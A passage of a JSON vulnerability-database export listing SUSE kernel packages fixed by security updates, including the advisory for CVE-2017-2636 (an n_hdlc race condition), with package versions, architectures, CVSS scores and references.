"packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-xen", "packageFilename": "kernel-xen-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-pae-devel", "packageFilename": "kernel-pae-devel-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-pae-extra", "packageFilename": "kernel-pae-extra-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-xen-debugsource", "packageFilename": "kernel-xen-debugsource-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-trace-base", "packageFilename": "kernel-trace-base-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Point of Sale", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-xen", "packageFilename": "kernel-xen-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-ec2", "packageFilename": "kernel-ec2-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-trace", "packageFilename": "kernel-trace-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-bigsmp-base", "packageFilename": "kernel-bigsmp-base-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-trace-debuginfo", "packageFilename": "kernel-trace-debuginfo-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-ec2", "packageFilename": "kernel-ec2-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-trace-debuginfo", "packageFilename": "kernel-trace-debuginfo-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE OpenStack Cloud", "OSVersion": "5", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-trace", "packageFilename": "kernel-trace-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-trace-base", "packageFilename": "kernel-trace-base-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-ec2-debuginfo", "packageFilename": "kernel-ec2-debuginfo-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-source", "packageFilename": "kernel-source-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-xen-base", "packageFilename": "kernel-xen-base-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Point of Sale", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-trace-base", "packageFilename": "kernel-trace-base-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-ec2-devel", "packageFilename": "kernel-ec2-devel-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Point of Sale", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-pae", "packageFilename": "kernel-pae-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-default-extra", "packageFilename": "kernel-default-extra-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-xen-base", "packageFilename": "kernel-xen-base-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager Proxy", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-ec2", "packageFilename": "kernel-ec2-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager Proxy", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-bigsmp-base", "packageFilename": "kernel-bigsmp-base-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Point of Sale", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-ec2-devel", "packageFilename": "kernel-ec2-devel-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-0.47.99.1", "arch": "ia64", "packageName": "kernel-default-extra", "packageFilename": "kernel-default-extra-3.0.101-0.47.99.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-default-man", "packageFilename": "kernel-default-man-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-trace", "packageFilename": "kernel-trace-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-xen", "packageFilename": "kernel-xen-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-trace-devel", "packageFilename": "kernel-trace-devel-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-xen-debugsource", "packageFilename": "kernel-xen-debugsource-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-trace", "packageFilename": "kernel-trace-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-ec2-debugsource", "packageFilename": "kernel-ec2-debugsource-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Point of Sale", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-source", "packageFilename": "kernel-source-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Manager Proxy", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-trace-base", "packageFilename": "kernel-trace-base-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Point of Sale", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE OpenStack Cloud", "OSVersion": "5", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-default", "packageFilename": "kernel-default-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager Proxy", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE OpenStack Cloud", "OSVersion": "5", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-ec2", "packageFilename": "kernel-ec2-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-trace-devel", "packageFilename": "kernel-trace-devel-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-default", "packageFilename": "kernel-default-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE OpenStack Cloud", "OSVersion": "5", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-source", "packageFilename": "kernel-source-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-pae-debuginfo", "packageFilename": "kernel-pae-debuginfo-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Point of Sale", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-pae-base", "packageFilename": "kernel-pae-base-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-trace", "packageFilename": "kernel-trace-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-trace-debuginfo", "packageFilename": "kernel-trace-debuginfo-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-default", "packageFilename": "kernel-default-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE OpenStack Cloud", "OSVersion": "5", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-trace-devel", "packageFilename": "kernel-trace-devel-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-bigsmp", "packageFilename": "kernel-bigsmp-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-bigsmp", "packageFilename": "kernel-bigsmp-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager Proxy", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-default-extra", "packageFilename": "kernel-default-extra-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Manager Proxy", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-bigsmp", "packageFilename": "kernel-bigsmp-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-bigsmp-debugsource", "packageFilename": "kernel-bigsmp-debugsource-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE OpenStack Cloud", "OSVersion": "5", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-0.47.99.1", "arch": "ppc64", "packageName": "kernel-ppc64-extra", "packageFilename": "kernel-ppc64-extra-3.0.101-0.47.99.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-default-extra", "packageFilename": "kernel-default-extra-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-default", "packageFilename": "kernel-default-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Point of Sale", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-trace", "packageFilename": "kernel-trace-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Point of Sale", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Manager Proxy", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-xen-base", "packageFilename": "kernel-xen-base-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-trace-devel", "packageFilename": "kernel-trace-devel-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-trace-base", "packageFilename": "kernel-trace-base-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-xen", "packageFilename": "kernel-xen-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-ec2-devel", "packageFilename": "kernel-ec2-devel-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE OpenStack Cloud", "OSVersion": "5", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-xen-base", "packageFilename": "kernel-xen-base-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-trace-base", "packageFilename": "kernel-trace-base-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Point of Sale", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-source", "packageFilename": "kernel-source-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE OpenStack Cloud", "OSVersion": "5", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-ec2-base", "packageFilename": "kernel-ec2-base-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-trace-debugsource", "packageFilename": "kernel-trace-debugsource-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}], "edition": 1, "description": "The SUSE Linux Enterprise 11 SP3 kernel was updated to fix the following\n security bug:\n\n CVE-2017-2636: A race condition in the n_hdlc tty Linux kernel driver\n (drivers/tty/n_hdlc.c) could have been exploited to gain a local privilege\n escalation (bnc#1027565)\n\n", "reporter": "Suse", "published": "2017-04-03T21:09:21", "title": "Security update for the Linux Kernel (important)", "type": "suse", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-2636"], "modified": "2017-04-03T21:09:21", "id": "SUSE-SU-2017:0913-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-04/msg00005.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-30T05:17:27", "references": ["https://bugzilla.suse.com/1027565", "https://bugzilla.suse.com/1030573", "https://bugzilla.suse.com/1028372"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-syms", "packageFilename": "kernel-syms-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "ppc64le", "packageName": "dlm-kmp-default", "packageFilename": "dlm-kmp-default-4.4.49-92.14.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.3", "arch": "noarch", "packageName": "kernel-docs", "packageFilename": "kernel-docs-4.4.49-92.14.3.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-syms", "packageFilename": "kernel-syms-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for Raspberry Pi", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "noarch", "packageName": "kernel-macros", "packageFilename": "kernel-macros-4.4.49-92.14.1.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "ppc64le", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-4.4.49-92.14.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "noarch", "packageName": "kernel-macros", "packageFilename": "kernel-macros-4.4.49-92.14.1.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for Raspberry Pi", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "noarch", "packageName": "kernel-source", "packageFilename": "kernel-source-4.4.49-92.14.1.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for Raspberry Pi", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "aarch64", "packageName": "kernel-syms", "packageFilename": "kernel-syms-4.4.49-92.14.1.aarch64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-default-base-debuginfo", "packageFilename": "kernel-default-base-debuginfo-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-obs-build", "packageFilename": "kernel-obs-build-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for Raspberry Pi", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "aarch64", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-4.4.49-92.14.1.aarch64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-default", "packageFilename": "kernel-default-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for Raspberry Pi", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "aarch64", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-4.4.49-92.14.1.aarch64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "ppc64le", "packageName": "ocfs2-kmp-default", "packageFilename": "ocfs2-kmp-default-4.4.49-92.14.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "ppc64le", "packageName": "kernel-obs-build-debugsource", "packageFilename": "kernel-obs-build-debugsource-4.4.49-92.14.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "ppc64le", "packageName": "kernel-obs-build", "packageFilename": "kernel-obs-build-4.4.49-92.14.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "aarch64", "packageName": "kernel-default-base-debuginfo", "packageFilename": "kernel-default-base-debuginfo-4.4.49-92.14.1.aarch64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "s390x", "packageName": "cluster-md-kmp-default", "packageFilename": "cluster-md-kmp-default-4.4.49-92.14.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "s390x", "packageName": "dlm-kmp-default", "packageFilename": "dlm-kmp-default-4.4.49-92.14.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "ppc64le", "packageName": "kernel-default-base-debuginfo", "packageFilename": "kernel-default-base-debuginfo-4.4.49-92.14.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for Raspberry Pi", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "aarch64", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-4.4.49-92.14.1.aarch64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "ocfs2-kmp-default", "packageFilename": 